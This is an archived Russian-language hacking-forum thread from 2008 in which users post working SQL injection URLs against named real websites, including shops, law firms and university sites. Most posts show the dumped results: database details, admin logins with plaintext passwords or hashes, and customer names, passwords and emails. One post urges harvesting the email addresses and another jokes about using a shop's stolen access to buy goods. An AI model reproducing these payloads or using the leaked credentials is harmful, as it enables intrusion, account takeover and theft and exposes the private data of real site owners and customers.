ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4681  
Старый 05.02.2008, 19:47
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.lawfirm.ee/image_view.php?img_id=-1+union+select+1,concat_ws(0x2F,version(),database (),user())/*

4.1.22/d13410sd10549/d13410sa17404@z129.zone.ee
-----------------------------------------------------------------------------

http://www.arcade-history.com/index.php?page=detail&id=-1+union+select+concat_ws(0x2F,version(),database() ,user()),2/*

5.0.45-log/arcade-historycom/teamhistory@imu124.infomaniak.ch
-----------------------------------------------------------------------------

http://mobile.jlaudio.com/multimedia_pages.php?page_id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4/*

4.0.23-nt/jlaudio/jldbuser@localhost


http://mobile.jlaudio.com/multimedia_pages.php?page_id=-1+union+select+1,2,concat_ws(0x2F,username,passwor d),4+from+users/*

логин/пароль
admin/m@n@ge
 
Ответить с цитированием

  #4682  
Старый 06.02.2008, 02:28
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662

Репутация: 435
Отправить сообщение для Sharingan с помощью ICQ
По умолчанию

Код:
http://www.culturefemme.com/actualites/detail.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6/*
5.0.44-log
отсюда
Код:
http://www.culturefemme.com/actualites/detail.php?id=-1+union+select+1,concat(admin_login,0x3a,admin_pwd),3,4,5,6,7,8,9,0,1,2,3,4,5,6+from+culturefclf.newslet_admin/*
всего 1 юзвер afroqueen:d0a22f9bf34b1a398e90136ec03a9f19
мб это и есть админ, хеш кинул на разшифровку =)

Код:
http://www.scenenationale61.com/detail_spectacles.php?id=-97+union+select+1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7/*
4.0.25-standard-log:scenenatsnaf@10.0.62.25:scenenatsnaf

Код:
http://www.presencemusulmane.org/publication_view.php?id=-34+union+select+1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,0,1,2/*
4.0.27-max-log:dbo152695116@74.208.16.155:db152695
со 2й попытки подобрал название
Код:
http://www.presencemusulmane.org/publication_view.php?id=-34+union+select+1,2,3,4,5,concat(user,0x3a,password),7,8,9,0,1,2+from+users/*
presencemusulmane:!Islam2006***
presencemusulmaneottawa:!Ottawa2006*
к фтп оба не подходят =(
 
Ответить с цитированием

  #4683  
Старый 06.02.2008, 11:19
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

Код:
http://www.fartingpreacher.org/index.php?action=showpic&cat=9999999&pic=9999999&pic=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
http://www.stopmoshorts.com/gallery/index.php?action=showpic&cat=9999999&pic=9999999&pic=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
 
Ответить с цитированием

  #4684  
Старый 06.02.2008, 12:03
random
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972

Репутация: 250
По умолчанию

edu
Код:
http://complit.princeton.edu/index.php?app=people&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,aes_decrypt(aes_encrypt(version(),0x41),0x41),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
http://www.hudson.edu/list.php?id=-536+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x41),0x41),4,5,6/*
http://wellness.byu.edu/cat.php?id=-3'+union+select+1,2,3,4,version(),6,7,8/*
http://telecom.colorado.edu/index.php?load=content&page_id=-79+union+select+1,2,3,4,version(),6,7,8,9,10/*
http://www.calnorthern.edu/index.php?action=schedule&f_id=18+union+select+1,2,3,4,aes_decrypt(aes_encrypt(version(),0x41),0x41),6,7,8,9,10,11,12,13,14,15/*
http://www.adison.edu/jobs_careers.php?cat_id=-3391+union+select+version(),2,3,4/*
http://www.nassonu.edu/show_cat.php?cat_id=-53+union+select+version(),2,3,4/*
http://www.peel.edu/website-resources.php?cat_id=-13580+union+select+version(),2,3,4/*
 
Ответить с цитированием

  #4685  
Старый 06.02.2008, 14:45
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

Магазин Октава (Музыкальное оборудование)
Код:
http://www.oktava-shop.com/view_prod.php?id=999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14/*
 
Ответить с цитированием

  #4686  
Старый 06.02.2008, 16:11
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

cural.ru - Мультимедиа-группа КСК - ведущий российский разработчик
комплексных презентационных решений.
Код:
http://www.cural.ru/core.php?p=283&nag=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9/*
5.0.45-log:cural:csc@localhost

На клиентов этой медиа-группы стоит взглянуть!!!:
Код:
http://www.cural.ru/core.php?p=2
 
Ответить с цитированием

  #4687  
Старый 06.02.2008, 19:37
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.mostiko.com/index.php?page=artist&view=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4/*

4.0.24_Debian-10-log/mostiko/mostiko@localhost

----------------------------------------------------------------------------

http://pray4exeter.clearthought.co.uk/dispArt.php?art=-1+union+select+1,2,3,4,5,concat_ws(0x2F,version(), database(),user()),7,8,9/*

5.0.45-community/web17-pray4exete/web17-pray4exete@localhost
----------------------------------------------------------------------------

http://www.fairvote.org/index.php?page=200&articlemode=showspecific&showar ticle=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7/*

5.0.45-community/fairvote_gonearethedays/fairvote_rsquare@localhost
----------------------------------------------------------------------------
tangodiva.com

http://www.tangodiva.com/index.php?page=features&j=1&cat=1&story_id=-1+union+select+concat_ws(0x2F,cast(version()+as+bi nary),cast(database()+as+binary),cast(user()+as+bi nary))/*

4.1.20/tangodiv tangodiva/tangodiv@localhost


http://www.tangodiva.com/index.php?page=features&j=1&cat=1&story_id=-1+union+select+concat_ws(0x2F,username,password,em ail)+from+td_users+limit+3300,1/*

логин/пароль/мейл
samgrinter/lyn2370/samgrinter@tangodiva.com
 
Ответить с цитированием

  #4688  
Старый 07.02.2008, 09:16
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию

Цитата:
http://www.wallables.com/catalog/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.tickettoride.org.uk/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.snazzycat.com/oscommerce/catalog/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.reggae.it/catalog2/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.purelyalpaca.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://store.legendtv.co.uk/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.amenbeads.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.compra-segura.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.sweetsunnah.fr/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.magoloco.com/tienda/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
вооо берем парсер мыльников и парсим базу и получаем на ваыходе крутую штуку блин =)))

Последний раз редактировалось satana8920; 07.02.2008 в 09:27..
 
Ответить с цитированием

  #4689  
Старый 07.02.2008, 09:18
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

Код:
http://shinza.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
http://irisgift.com/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8,9+from+customers/*
http://www.amenbeads.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
http://www.purelyalpaca.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
Подробности тут: https://forum.antichat.ru/showpost.php?p=586483&postcount=59
 
Ответить с цитированием

  #4690  
Старый 07.02.2008, 11:33
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Цитата:
http://fortedistribution.co.uk/title.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws( 0x3a,username,password),30,31,32,33,34,35,36+from+ users/*
Заходим в шоп...покупаем че-нить =\
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ